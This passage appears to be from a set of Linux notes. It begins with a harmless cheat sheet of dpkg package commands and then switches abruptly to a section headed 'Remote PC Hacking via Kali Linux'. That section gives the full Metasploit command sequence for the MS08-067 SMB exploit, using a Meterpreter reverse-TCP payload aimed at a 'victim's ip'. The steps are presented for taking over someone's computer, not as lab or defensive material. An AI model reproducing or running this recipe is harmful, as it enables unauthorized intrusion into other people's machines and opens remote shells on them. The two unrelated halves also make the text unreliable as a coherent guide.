man apt: Will give you more info on these commands as well as many that are in less common usage.

Common dpkg commands
dpkg -i <package.deb>: Installs a package file; one that you downloaded manually, for example.
dpkg -c <package.deb>: Lists the contents of <package.deb>, a .deb file.
dpkg -I <package.deb>: Extracts package information from <package.deb>, a .deb file.
dpkg -r <package>: Removes an installed package named <package>.
dpkg -P <package>: Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.
dpkg -L <package>: Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.
dpkg -s <package>: Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.
dpkg-reconfigure <package>: Reconfigures an installed package.
man dpkg: Will give you more info on these commands as well as many that are in less common usage.

Remote PC Hacking via Kali Linux

Remote PC Hacking via Kali Linux using Metasploit

Open a terminal and type:
msfconsole

Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your IP address* (If you don't know your IP address, open a new terminal and type:
ifconfig

Your IP address will be somewhere in the output, e.g. inet addr:192.168.101.100)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(Now You should connect)